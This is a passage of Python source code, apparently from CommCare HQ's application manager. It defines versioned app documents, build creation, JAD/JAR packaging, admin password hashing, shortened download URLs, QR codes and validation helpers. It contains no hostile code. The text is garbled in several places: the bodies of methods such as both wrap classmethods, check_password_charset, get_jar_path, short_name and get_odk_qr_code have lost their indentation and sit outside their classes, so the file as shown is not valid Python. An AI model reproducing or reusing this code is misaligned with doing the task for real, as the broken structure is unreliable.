    _meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']

    @property
    def id(self):
        return self._id

    def save(self, response_json=None, increment_version=None, **params):
        """Save the doc, bumping ``version`` for primary docs (not copies).

        When ``response_json`` is given, record the new version under
        ``response_json['update']['app-version']``.
        """
        if increment_version is None:
            # Only the primary doc (not builds/copies) auto-increments.
            increment_version = not self.copy_of
        if increment_version:
            self.version = self.version + 1 if self.version else 1
        super(VersionedDoc, self).save(**params)
        if response_json is not None:
            if 'update' not in response_json:
                response_json['update'] = {}
            response_json['update']['app-version'] = self.version

    def make_build(self):
        """Return an (unsaved) copy of this doc representing a build.

        Reuses an existing saved build of the same version when one exists;
        otherwise deep-copies this doc, strips build-irrelevant fields and
        copies the attachments over.
        """
        assert self.get_id
        assert self.copy_of is None
        cls = self.__class__

        copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
        if copies:
            copy = copies[0]
        else:
            copy = deepcopy(self.to_json())
            bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
                        'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')

            for bad_key in bad_keys:
                if bad_key in copy:
                    del copy[bad_key]

            copy = cls.wrap(copy)
            copy['copy_of'] = self._id

            copy.copy_attachments(self)
        return copy

    def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
        """Lazily copy ``other``'s attachments whose names match ``regexp``
        (all of them when ``regexp`` is None)."""
        for name in other.lazy_list_attachments() or {}:
            if regexp is None or re.match(regexp, name):
                self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)

    def make_reversion_to_copy(self, copy):
        """
        Replaces couch doc with a copy of the backup ("copy").
        Returns the another Application/RemoteApp referring to this
        updated couch doc. The returned doc should be used in place of
        the original doc, i.e. should be called as follows:
            app = app.make_reversion_to_copy(copy)
            app.save()
        """
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        app = deepcopy(copy.to_json())
        # Keep this doc's identity and version; only the content reverts.
        app['_rev'] = self._rev
        app['_id'] = self._id
        app['version'] = self.version
        app['copy_of'] = None
        app.pop('_attachments', None)
        app.pop('external_blobs', None)
        cls = self.__class__
        app = cls.wrap(app)
        app.copy_attachments(copy)
        return app

    def delete_copy(self, copy):
        """Soft-delete a build of this doc (without a version bump)."""
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        copy.delete_app()
        copy.save(increment_version=False)

    def scrub_source(self, source):
        """
        To be overridden.

        Use this to scrub out anything
        that should not be shown in the
        application source, such as ids, etc.
        """
        return source

    def export_json(self, dump_json=True):
        """Serialize this doc (minus meta fields, plus raw attachment
        content) for export; a JSON string unless ``dump_json`` is False."""
        source = deepcopy(self.to_json())
        for field in self._meta_fields:
            if field in source:
                del source[field]
        _attachments = {}
        for name in self.lazy_list_attachments():
            if re.match(ATTACHMENT_REGEX, name):
                # FIXME loss of metadata (content type, etc.)
                _attachments[name] = self.lazy_fetch_attachment(name)

        # the '_attachments' value is a dict of `name: blob_content`
        # pairs, and is part of the exported (serialized) app interface
        source['_attachments'] = _attachments
        source.pop("external_blobs", None)
        source = self.scrub_source(source)

        return json.dumps(source) if dump_json else source

    @classmethod
    def from_source(cls, source, domain):
        """Wrap an exported source dict as a new doc in ``domain``."""
        for field in cls._meta_fields:
            if field in source:
                del source[field]
        source['domain'] = domain
        app = cls.wrap(source)
        return app

    def is_deleted(self):
        return self.doc_type.endswith(DELETED_SUFFIX)

    def unretire(self):
        """Undo a soft delete by restoring the original doc_type."""
        self.doc_type = self.get_doc_type()
        self.save()

    def get_doc_type(self):
        # doc_type without the deletion suffix, if present.
        if self.doc_type.endswith(DELETED_SUFFIX):
            return self.doc_type[:-len(DELETED_SUFFIX)]
        else:
            return self.doc_type
def absolute_url_property(method):
    """
    Helper for the various fully qualified application URLs
    Turns a method returning an unqualified URL
    into a property returning a fully qualified URL
    (e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
    Expects `self.url_base` to be fully qualified url base
    """
    @wraps(method)
    def _fully_qualified(self):
        return "{}{}".format(self.url_base, method(self))
    return property(_fully_qualified)
class BuildProfile(DocumentSchema):
    """A named subset of the app's languages to build for."""

    name = StringProperty()
    langs = StringListProperty()

    def __eq__(self, other):
        # NOTE(review): equality compares only ``langs`` — two profiles with
        # different names but the same languages compare equal, and no
        # ``__hash__`` is defined to match; confirm this is intended.
        return self.langs == other.langs

    def __ne__(self, other):
        return not self.__eq__(other)
class MediaList(DocumentSchema):
    """List of multimedia references used by one language."""

    media_refs = StringListProperty()
class ApplicationBase(VersionedDoc, SnapshotMixin,
                      CommCareFeatureSupportMixin,
                      CommentMixin):
    """
    Abstract base class for Application and RemoteApp.
    Contains methods for generating the various files and zipping them into CommCare.jar

    See note at top of file for high-level overview.
    """

    recipients = StringProperty(default="")

    # this is the supported way of specifying which commcare build to use
    build_spec = SchemaProperty(BuildSpec)
    platform = StringProperty(
        choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
        default="nokia/s40"
    )
    text_input = StringProperty(
        choices=['roman', 'native', 'custom-keys', 'qwerty'],
        default="roman"
    )

    # The following properties should only appear on saved builds
    # built_with stores a record of CommCare build used in a saved app
    built_with = SchemaProperty(BuildRecord)
    build_signed = BooleanProperty(default=True)
    built_on = DateTimeProperty(required=False)
    build_comment = StringProperty()
    comment_from = StringProperty()
    build_broken = BooleanProperty(default=False)
    # not used yet, but nice for tagging/debugging
    # currently only canonical value is 'incomplete-build',
    # for when build resources aren't found where they should be
    build_broken_reason = StringProperty()

    # watch out for a past bug:
    # when reverting to a build that happens to be released
    # that got copied into the new app doc, and when new releases were made,
    # they were automatically starred
    # AFAIK this is fixed in code, but may rear its ugly head in an as-yet-not-understood
    # way for apps that already had this problem. Just keep an eye out
    is_released = BooleanProperty(default=False)

    # django-style salted hash of the admin password
    admin_password = StringProperty()
    # a=Alphanumeric, n=Numeric, x=Neither (not allowed)
    admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')

    # This is here instead of in Application because it needs to be available in stub representation
    application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
    langs = StringListProperty()

    secure_submissions = BooleanProperty(default=False)

    # metadata for data platform
    amplifies_workers = StringProperty(
        choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
        default=AMPLIFIES_NOT_SET
    )
    amplifies_project = StringProperty(
        choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
        default=AMPLIFIES_NOT_SET
    )
    minimum_use_threshold = StringProperty(
        default='15'
    )
    experienced_threshold = StringProperty(
        default='3'
    )

    # exchange properties
    cached_properties = DictProperty()
    description = StringProperty()
    deployment_date = DateTimeProperty()
    phone_model = StringProperty()
    user_type = StringProperty()
    attribution_notes = StringProperty()

    # always false for RemoteApp
    case_sharing = BooleanProperty(default=False)
    vellum_case_management = BooleanProperty(default=False)

    build_profiles = SchemaDictProperty(BuildProfile)

    # each language is a key and the value is a list of multimedia referenced in that language
    media_language_map = SchemaDictProperty(MediaList)

    use_j2me_endpoint = BooleanProperty(default=False)

    # Whether or not the Application has had any forms submitted against it
    has_submissions = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
should_save = False
# scrape for old conventions and get rid of them
if 'commcare_build' in data:
version, build_number = data['commcare_build'].split('/')
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_build']
if 'commcare_tag' in data:
version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_tag']
if data.has_key("built_with") and isinstance(data['built_with'], basestring):
data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
if 'native_input' in data:
if 'text_input' not in data:
data['text_input'] = 'native' if data['native_input'] else 'roman'
del data['native_input']
if 'build_langs' in data:
if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
data['build_profiles'] = {
uuid.uuid4().hex: dict(
name=', '.join(data['build_langs']),
langs=data['build_langs']
)
}
should_save = True
del data['build_langs']
if data.has_key('original_doc'):
data['copy_history'] = [data.pop('original_doc')]
should_save = True
data["description"] = data.get('description') or data.get('short_description')
self = super(ApplicationBase, cls).wrap(data)
if not self.build_spec or self.build_spec.is_null():
self.build_spec = get_default_build_spec(self.application_version)
if should_save:
self.save()
return self
    def rename_lang(self, old_lang, new_lang):
        # Base implementation only validates the new language code;
        # subclasses handle renaming it throughout their content.
        validate_lang(new_lang)
    def is_remote_app(self):
        # Base implementation; RemoteApp presumably overrides — confirm.
        return False
    def get_latest_app(self, released_only=True):
        """Return the latest version of this app.

        With ``released_only`` (the default), delegate to ``get_app`` with
        ``latest=True``; otherwise take the newest doc for this app id from
        the couch view.
        """
        if released_only:
            return get_app(self.domain, self.get_id, latest=True)
        else:
            # Descending over [domain, id, version] keys: first row is newest.
            return self.view('app_manager/applications',
                             startkey=[self.domain, self.get_id, {}],
                             endkey=[self.domain, self.get_id],
                             include_docs=True,
                             limit=1,
                             descending=True,
                             ).first()
    @memoized
    def get_latest_saved(self):
        """
        Return the latest released build of this app, falling back to the
        latest saved build, or None if no build exists.
        (This looks really similar to get_latest_app.)
        """
        doc = (get_latest_released_app_doc(self.domain, self._id) or
               get_latest_build_doc(self.domain, self._id))
        return self.__class__.wrap(doc) if doc else None
    def set_admin_password(self, raw_password):
        """Hash and store the admin password, recording its charset."""
        salt = os.urandom(5).encode('hex')
        self.admin_password = make_password(raw_password, salt=salt)

        # Record the charset so builds can check it against the profile's
        # password_format setting.
        # NOTE(review): ``isnumeric`` exists only on unicode (not str) in
        # Python 2 — confirm raw_password is always unicode here.
        if raw_password.isnumeric():
            self.admin_password_charset = 'n'
        elif raw_password.isalnum():
            self.admin_password_charset = 'a'
        else:
            self.admin_password_charset = 'x'
def check_password_charset(self):
errors = []
if hasattr(self, 'profile'):
password_format = self.profile.get('properties', {}).get('password_format', 'n')
message = ('Your app requires {0} passwords '
'but the admin password is not {0}')
if password_format == 'n' and self.admin_password_charset in 'ax':
errors.append({'type': 'password_format',
'message': message.format('numeric')})
if password_format == 'a' and self.admin_password_charset in 'x':
errors.append({'type': 'password_format',
'message': message.format('alphanumeric')})
return errors
    def get_build(self):
        """The CommCare build object selected by this app's build spec."""
        return self.build_spec.get_build()
    @property
    def build_version(self):
        """The build spec's version as a LooseVersion; None when unset."""
        # `LooseVersion`s are smart!
        # LooseVersion('2.12.0') > '2.2'
        # (even though '2.12.0' < '2.2')
        if self.build_spec.version:
            return LooseVersion(self.build_spec.version)
    @property
    def commcare_minor_release(self):
        """This is mostly just for views"""
        # e.g. a (2, 27) minor-release tuple becomes '2.27'.
        return '%d.%d' % self.build_spec.minor_release()
@property
def short_name(self):
return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
    @property
    def has_careplan_module(self):
        # Base implementation: no careplan module.
        return False
    @property
    def url_base(self):
        # A `custom_base_url` attribute, when present and truthy,
        # overrides the default URL base.
        custom_base_url = getattr(self, 'custom_base_url', None)
        return custom_base_url or get_url_base()
    @absolute_url_property
    def post_url(self):
        """Fully qualified form-submission URL for this app."""
        if self.secure_submissions:
            url_name = 'receiver_secure_post_with_app_id'
        else:
            url_name = 'receiver_post_with_app_id'
        return reverse(url_name, args=[self.domain, self.get_id])
    @absolute_url_property
    def key_server_url(self):
        """Fully qualified key-server URL for this app's domain."""
        return reverse('key_server_url', args=[self.domain])
    @absolute_url_property
    def ota_restore_url(self):
        """Fully qualified OTA restore URL for this app."""
        return reverse('app_aware_restore', args=[self.domain, self._id])
    @absolute_url_property
    def form_record_url(self):
        """Fully qualified PACT form-data API URL for this domain."""
        return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
    @absolute_url_property
    def hq_profile_url(self):
        """Fully qualified URL of the (latest) profile download."""
        # RemoteApp already has a property called "profile_url",
        # Application.profile_url just points here to stop the conflict
        # http://manage.dimagi.com/default.asp?227088#1149422
        return "%s?latest=true" % (
            reverse('download_profile', args=[self.domain, self._id])
        )
    @absolute_url_property
    def media_profile_url(self):
        """Fully qualified URL of the (latest) media profile download."""
        return "%s?latest=true" % (
            reverse('download_media_profile', args=[self.domain, self._id])
        )
    @property
    def profile_loc(self):
        # JavaRosa resource reference for the profile on the device.
        return "jr://resource/profile.xml"
    @absolute_url_property
    def jar_url(self):
        """Fully qualified URL of the CommCare.jar download."""
        return reverse('corehq.apps.app_manager.views.download_jar', args=[self.domain, self._id])
def get_jar_path(self):
spec = {
'nokia/s40': 'Nokia/S40',
'nokia/s60': 'Nokia/S60',
'generic': 'Generic/Default',
'winmo': 'Native/WinMo'
}[self.platform]
if self.platform in ('nokia/s40', 'nokia/s60'):
spec += {
('native',): '-native-input',
('roman',): '-generic',
('custom-keys',): '-custom-keys',
('qwerty',): '-qwerty'
}[(self.text_input,)]
return spec
    def get_jadjar(self):
        """The jad/jar pair for this app's platform and selected build."""
        return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
    def validate_fixtures(self):
        """Raise PermissionDenied if any form uses lookup tables without the
        LOOKUP_TABLES privilege."""
        if not domain_has_privilege(self.domain, privileges.LOOKUP_TABLES):
            # remote apps don't support get_forms yet.
            # for now they can circumvent the fixture limitation. sneaky bastards.
            if hasattr(self, 'get_forms'):
                for form in self.get_forms():
                    if form.has_fixtures:
                        raise PermissionDenied(_(
                            "Usage of lookup tables is not supported by your "
                            "current subscription. Please upgrade your "
                            "subscription before using this feature."
                        ))
    def validate_intents(self):
        """Raise PermissionDenied if a form uses ODK intents the domain's
        subscription does not allow (custom vs. templated integrations)."""
        if domain_has_privilege(self.domain, privileges.CUSTOM_INTENTS):
            # Custom intents allowed: nothing to check.
            return

        if hasattr(self, 'get_forms'):
            for form in self.get_forms():
                intents = form.wrapped_xform().odk_intents
                if intents:
                    if not domain_has_privilege(self.domain, privileges.TEMPLATED_INTENTS):
                        raise PermissionDenied(_(
                            "Usage of integrations is not supported by your "
                            "current subscription. Please upgrade your "
                            "subscription before using this feature."
                        ))
                    else:
                        # Templated intents only: every intent used must be
                        # one of the known callout templates.
                        templates = next(app_callout_templates)
                        if len(set(intents) - set(t['id'] for t in templates)):
                            raise PermissionDenied(_(
                                "Usage of external integration is not supported by your "
                                "current subscription. Please upgrade your "
                                "subscription before using this feature."
                            ))
    def validate_jar_path(self):
        """Raise AppEditingError if the chosen text_input mode is not
        supported by the selected CommCare build version."""
        build = self.get_build()
        setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
        value = self.text_input
        setting_version = setting['since'].get(value)

        if setting_version:
            setting_version = tuple(map(int, setting_version.split('.')))
            my_version = build.minor_release()

            if my_version < setting_version:
                i = setting['values'].index(value)
                # list.index raises ValueError when absent, so i is always
                # valid here; the assert is belt-and-braces.
                assert i != -1
                name = _(setting['value_names'][i])
                raise AppEditingError((
                    '%s Text Input is not supported '
                    'in CommCare versions before %s.%s. '
                    '(You are using %s.%s)'
                ) % ((name,) + setting_version + my_version))
    @property
    def jad_settings(self):
        """Key/value settings written into the app's CommCare.jad file."""
        settings = {
            'JavaRosa-Admin-Password': self.admin_password,
            'Profile': self.profile_loc,
            'MIDlet-Jar-URL': self.jar_url,
            #'MIDlet-Name': self.name,
            # e.g. 2011-Apr-11 20:45
            'CommCare-Release': "true",
        }
        if self.build_version < '2.8':
            # Older CommCare versions expect the build number in the jad.
            settings['Build-Number'] = self.version
        return settings
    def create_build_files(self, save=False, build_profile_id=None):
        """Generate all build artifacts and stage them as 'files/*' attachments.

        When ``save`` is True also records the build metadata (built_on,
        built_with) on the document; attachments are staged lazily and
        persisted by the caller's save.
        """
        built_on = datetime.datetime.utcnow()
        all_files = self.create_all_files(build_profile_id)
        if save:
            self.built_on = built_on
            self.built_with = BuildRecord(
                version=self.build_spec.version,
                build_number=self.version,
                datetime=built_on,
            )

            for filepath in all_files:
                self.lazy_put_attachment(all_files[filepath],
                                         'files/%s' % filepath)
    def create_jadjar_from_build_files(self, save=False):
        """Return the (jad, jar) pair for this build, packing it from the
        staged 'files/*' attachments on first use and caching the result as
        the 'CommCare.jad'/'CommCare.jar' attachments.
        """
        self.validate_jar_path()
        # serialize packing per app id so concurrent requests don't race
        with CriticalSection(['create_jadjar_' + self._id]):
            try:
                # fast path: already packed and attached
                return (
                    self.lazy_fetch_attachment('CommCare.jad'),
                    self.lazy_fetch_attachment('CommCare.jar'),
                )
            except (ResourceError, KeyError):
                all_files = {
                    filename[len('files/'):]: self.lazy_fetch_attachment(filename)
                    for filename in self.blobs if filename.startswith('files/')
                }
                # normalize everything to bytes for the packer
                # (Python 2: str is bytes; unicode gets utf-8 encoded)
                all_files = {
                    name: (contents if isinstance(contents, str) else contents.encode('utf-8'))
                    for name, contents in all_files.items()
                }
                release_date = self.built_with.datetime or datetime.datetime.utcnow()
                jad_settings = {
                    'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
                }
                jad_settings.update(self.jad_settings)
                jadjar = self.get_jadjar().pack(all_files, jad_settings)

                if save:
                    self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
                    self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
                    self.built_with.signed = jadjar.signed

                return jadjar.jad, jadjar.jar
    def validate_app(self):
        """Run a full build validation pass and return a list of error dicts.

        Errors are collected rather than raised; each dict carries at least a
        'type' key. Unexpected exceptions are logged (with the current request
        attached for context) and reported as generic errors, except under
        settings.DEBUG where they propagate.
        """
        errors = []

        errors.extend(self.check_password_charset())

        try:
            self.validate_fixtures()
            self.validate_intents()
            # building the files is itself the deepest validation we have
            self.create_all_files()
        except CaseXPathValidationError as cve:
            errors.append({
                'type': 'invalid case xpath reference',
                'module': cve.module,
                'form': cve.form,
            })
        except UserCaseXPathValidationError as ucve:
            errors.append({
                'type': 'invalid user case xpath reference',
                'module': ucve.module,
                'form': ucve.form,
            })
        except (AppEditingError, XFormValidationError, XFormException,
                PermissionDenied, SuiteValidationError) as e:
            errors.append({'type': 'error', 'message': unicode(e)})
        except Exception as e:
            if settings.DEBUG:
                raise

            # this is much less useful/actionable without a URL
            # so make sure to include the request
            logging.error('Unexpected error building app', exc_info=True,
                          extra={'request': view_utils.get_request()})
            errors.append({'type': 'error', 'message': 'unexpected error: %s' % e})
        return errors
    @absolute_url_property
    def odk_profile_url(self):
        # canonical download URL for the ODK profile
        return reverse('corehq.apps.app_manager.views.download_odk_profile', args=[self.domain, self._id])

    @absolute_url_property
    def odk_media_profile_url(self):
        # canonical download URL for the ODK media profile
        return reverse('corehq.apps.app_manager.views.download_odk_media_profile', args=[self.domain, self._id])

    @property
    def odk_profile_display_url(self):
        # prefer the shortened (bitly) URL when one has been generated
        return self.short_odk_url or self.odk_profile_url

    @property
    def odk_media_profile_display_url(self):
        # prefer the shortened (bitly) URL when one has been generated
        return self.short_odk_media_url or self.odk_media_profile_url
def get_odk_qr_code(self, with_media=False, build_profile_id=None):
"""Returns a QR code, as a PNG to install on CC-ODK"""
try:
return self.lazy_fetch_attachment("qrcode.png")
except ResourceNotFound:
from pygooglechart import QRChart
HEIGHT = WIDTH = 250
code = QRChart(HEIGHT, WIDTH)
url = self.odk_profile_url if not with_media else self.odk_media_profile_url
if build_profile_id is not None:
url += '?profile={profile_id}'.format(profile_id=build_profile_id)
code.add_data(url)
# "Level L" error correction with a 0 pixel margin
code.set_ec('L', 0)
f, fname = tempfile.mkstemp()
code.download(fname)
os.close(f)
with open(fname, "rb") as f:
png_data = f.read()
self.lazy_put_attachment(png_data, "qrcode.png",
content_type="image/png")
return png_data
    def generate_shortened_url(self, url_type, build_profile_id=None):
        """Return a bitly-shortened URL for the named download view, or None.

        Returns None when BITLY_LOGIN is not configured; on any bitly/network
        failure the exception is logged and the method falls through, which
        also returns None (the `else` return is only reached on success).
        """
        try:
            if settings.BITLY_LOGIN:
                view_name = 'corehq.apps.app_manager.views.{}'.format(url_type)
                if build_profile_id is not None:
                    long_url = "{}{}?profile={}".format(
                        self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
                    )
                else:
                    long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
                shortened_url = bitly.shorten(long_url)
            else:
                shortened_url = None
        except Exception:
            # best-effort: a failed shorten should never break the caller
            logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
        else:
            return shortened_url
    def get_short_url(self, build_profile_id=None):
        """Return a short URL for the JAD download, caching it on the doc
        (and saving) for the default profile; profile-specific URLs are
        regenerated on every call and not cached.
        """
        if not build_profile_id:
            if not self.short_url:
                self.short_url = self.generate_shortened_url('download_jad')
                self.save()
            return self.short_url
        else:
            return self.generate_shortened_url('download_jad', build_profile_id)

    def get_short_odk_url(self, with_media=False, build_profile_id=None):
        """Same caching strategy as get_short_url, for the ODK (media)
        profile download URLs.
        """
        if not build_profile_id:
            if with_media:
                if not self.short_odk_media_url:
                    self.short_odk_media_url = self.generate_shortened_url('download_odk_media_profile')
                    self.save()
                return self.short_odk_media_url
            else:
                if not self.short_odk_url:
                    self.short_odk_url = self.generate_shortened_url('download_odk_profile')
                    self.save()
                return self.short_odk_url
        else:
            if with_media:
                return self.generate_shortened_url('download_odk_media_profile', build_profile_id)
            else:
                return self.generate_shortened_url('download_odk_profile', build_profile_id)
    def fetch_jar(self):
        # fetch the base CommCare jar for this app's build spec
        return self.get_jadjar().fetch_jar()
    def make_build(self, comment=None, user_id=None, previous_version=None):
        """Create a saved-build copy of this app with all build files staged.

        Form/media versions are carried over from ``previous_version`` where
        unchanged; a change in build profiles forces all forms to get new
        versions. Returns the (unsaved) copy.
        """
        copy = super(ApplicationBase, self).make_build()
        if not copy._id:
            # I expect this always to be the case
            # but check explicitly so as not to change the _id if it exists
            copy._id = copy.get_db().server.next_uuid()

        force_new_forms = False
        if previous_version and self.build_profiles != previous_version.build_profiles:
            force_new_forms = True
        copy.set_form_versions(previous_version, force_new_forms)
        copy.set_media_versions(previous_version)
        copy.create_build_files(save=True)

        # since this hard to put in a test
        # I'm putting this assert here if copy._id is ever None
        # which makes tests error
        assert copy._id

        copy.build_comment = comment
        copy.comment_from = user_id
        if user_id:
            user = CouchUser.get(user_id)
            if not user.has_built_app:
                # first build by this user: flag them (analytics)
                user.has_built_app = True
                user.save()
        copy.is_released = False

        if not copy.is_remote_app():
            copy.update_mm_map()

        return copy
    def delete_app(self):
        """Soft-delete: mark the doc type '-Deleted' and return a saved
        DeleteApplicationRecord that supports undelete."""
        domain_has_apps.clear(self.domain)  # invalidate the cached flag
        self.doc_type += '-Deleted'
        record = DeleteApplicationRecord(
            domain=self.domain,
            app_id=self.id,
            datetime=datetime.datetime.utcnow()
        )
        record.save()
        return record

    def save(self, response_json=None, increment_version=None, **params):
        # a brand-new app (no _rev) may flip the domain's has-apps flag
        if not self._rev and not domain_has_apps(self.domain):
            domain_has_apps.clear(self.domain)
        super(ApplicationBase, self).save(
            response_json=response_json, increment_version=increment_version, **params)

    def set_form_versions(self, previous_version, force_new_version=False):
        # by default doing nothing here is fine.
        # subclasses with forms (Application) override this
        pass

    def set_media_versions(self, previous_version):
        # overridden by subclasses that carry multimedia
        pass
    def update_mm_map(self):
        """Rebuild media_language_map: per-language lists of multimedia paths
        referenced by the app's forms. Only populated when build profiles are
        in use and the domain has the BUILD_PROFILES privilege; otherwise the
        map is cleared.
        """
        if self.build_profiles and domain_has_privilege(self.domain, privileges.BUILD_PROFILES):
            for lang in self.langs:
                self.media_language_map[lang] = MediaList()
            for form in self.get_forms():
                xml = form.wrapped_xform()
                for lang in self.langs:
                    media = []
                    for path in xml.all_media_references(lang):
                        if path is not None:
                            media.append(path)
                            map_item = self.multimedia_map.get(path)
                            # don't break if multimedia is missing from the map
                            if map_item:
                                map_item.form_media = True
                    self.media_language_map[lang].media_refs.extend(media)
        else:
            self.media_language_map = {}

    def get_build_langs(self, build_profile_id=None):
        """Languages to include in a build: the profile's langs when a
        profile id is given, else all of the app's langs."""
        if build_profile_id is not None:
            return self.build_profiles[build_profile_id].langs
        else:
            return self.langs
def validate_lang(lang):
    """Raise ValueError unless *lang* looks like a 2-3 letter ISO language
    code, optionally followed by a lowercase region suffix (e.g. 'en-us')."""
    if re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang) is None:
        raise ValueError("Invalid Language")
def validate_property(property):
    """Validate a case property name, raising ValueError if it is malformed.

    Property names are slash-separated path segments, each starting with a
    letter and continuing with word characters, '_' or '-'.

    >>> validate_property('parent/maternal-grandmother_fullName')
    >>> validate_property('foo+bar')
    Traceback (most recent call last):
        ...
    ValueError: Invalid Property
    """
    # this regex is also copied in propertyList.ejs
    if re.match(r'^[a-zA-Z][\w_-]*(/[a-zA-Z][\w_-]*)*$', property) is None:
        raise ValueError("Invalid Property")
def validate_detail_screen_field(field):
    """Raise ValueError unless *field* is a legal case-detail sort field
    (optional 'prefix:' qualifiers, optional 'path/' segments, optional
    leading '#' on the final name)."""
    # If you change here, also change here:
    # corehq/apps/app_manager/static/app_manager/js/detail-screen-config.js
    if re.match(r'^([a-zA-Z][\w_-]*:)*([a-zA-Z][\w_-]*/)*#?[a-zA-Z][\w_-]*$', field) is None:
        raise ValueError("Invalid Sort Field")
class SavedAppBuild(ApplicationBase):
    """A saved (versioned) build of an application."""

    def to_saved_build_json(self, timezone):
        """Return a display-ready JSON summary of this build.

        Strips the heavyweight keys from the raw doc, formats the build
        timestamp in the user's timezone, and resolves the commenting user's
        display name.
        """
        data = super(SavedAppBuild, self).to_json().copy()
        # BUG FIX: a missing comma after 'translations' made Python
        # concatenate it with 'description' into the single bogus key
        # 'translationsdescription', so neither key was actually removed.
        for key in ('modules', 'user_registration', 'external_blobs',
                    '_attachments', 'profile', 'translations',
                    'description', 'short_description'):
            data.pop(key, None)
        built_on_user_time = ServerTime(self.built_on).user_time(timezone)
        data.update({
            'id': self.id,
            'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
            'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
            'menu_item_label': self.built_with.get_menu_item_label(),
            'jar_path': self.get_jar_path(),
            'short_name': self.short_name,
            'enable_offline_install': self.enable_offline_install,
        })
        comment_from = data['comment_from']
        if comment_from:
            try:
                comment_user = CouchUser.get(comment_from)
            except ResourceNotFound:
                # fall back to the raw user id when the user doc is gone
                data['comment_user_name'] = comment_from
            else:
                data['comment_user_name'] = comment_user.full_name

        return data
class Application(ApplicationBase, TranslationMixin, HQMediaMixin):
    """
    An Application that can be created entirely through the online interface
    """
    modules = SchemaListProperty(ModuleBase)
    name = StringProperty()
    # profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
    # ended up not using a schema because properties is a reserved word
    profile = DictProperty()
    use_custom_suite = BooleanProperty(default=False)
    # overrides the default URL base for generated profile/suite URLs
    custom_base_url = StringProperty()
    cloudcare_enabled = BooleanProperty(default=False)
    # how app strings are generated; keys of app_strings.CHOICES
    translation_strategy = StringProperty(default='select-known',
                                          choices=app_strings.CHOICES.keys())
    commtrack_requisition_mode = StringProperty(choices=CT_REQUISITION_MODES)
    auto_gps_capture = BooleanProperty(default=False)
    # template slug this app was created from, if any
    created_from_template = StringProperty()
    use_grid_menus = BooleanProperty(default=False)
    @property
    @memoized
    def commtrack_enabled(self):
        """Whether the app's domain has CommTrack enabled (memoized)."""
        if settings.UNIT_TESTING:
            return False  # override with .tests.util.commtrack_enabled
        domain_obj = Domain.get_by_name(self.domain) if self.domain else None
        return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
for module in data.get('modules', []):
for attr in ('case_label', 'referral_label'):
if not module.has_key(attr):
module[attr] = {}
for lang in data['langs']:
if not module['case_label'].get(lang):
module['case_label'][lang] = commcare_translations.load_translations(lang).get('cchq.case', 'Cases')
if not module['referral_label'].get(lang):
module['referral_label'][lang] = commcare_translations.load_translations(lang).get('cchq.referral', 'Referrals')
data.pop('commtrack_enabled', None) # Remove me after migrating apps
self = super(Application, cls).wrap(data)
# make sure all form versions are None on working copies
if not self.copy_of:
for form in self.get_forms():
form.version = None
# weird edge case where multimedia_map gets set to null and causes issues
if self.multimedia_map is None:
self.multimedia_map = {}
return self
    def save(self, *args, **kwargs):
        """Save and fire the app_post_save signal."""
        super(Application, self).save(*args, **kwargs)
        # Import loop if this is imported at the top
        # TODO: revamp so signal_connections <- models <- signals
        from corehq.apps.app_manager import signals
        signals.app_post_save.send(Application, application=self)

    def make_reversion_to_copy(self, copy):
        """Revert this app to ``copy``, clearing per-form caches/versions and
        the build_broken flag on the reverted app."""
        app = super(Application, self).make_reversion_to_copy(copy)

        for form in app.get_forms():
            # reset the form's validation cache, since the form content is
            # likely to have changed in the revert!
            form.validation_cache = None
            form.version = None

        app.build_broken = False

        return app
    @property
    def profile_url(self):
        return self.hq_profile_url

    @absolute_url_property
    def suite_url(self):
        return reverse('download_suite', args=[self.domain, self.get_id])

    @property
    def suite_loc(self):
        # location of suite.xml as referenced from the profile:
        # relative path for modern builds, jr:// resource URI otherwise
        if self.enable_relative_suite_path:
            return './suite.xml'
        else:
            return "jr://resource/suite.xml"

    @absolute_url_property
    def media_suite_url(self):
        return reverse('download_media_suite', args=[self.domain, self.get_id])

    @property
    def media_suite_loc(self):
        # same convention as suite_loc, for the media suite
        if self.enable_relative_suite_path:
            return "./media_suite.xml"
        else:
            return "jr://resource/media_suite.xml"

    @property
    def default_language(self):
        # first configured language, falling back to English
        return self.langs[0] if len(self.langs) > 0 else "en"
    def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
        """Render a form's XForm as utf-8 bytes, validating it first.

        Pass either ``form`` directly or a (module_id, form_id) pair.
        """
        if not form:
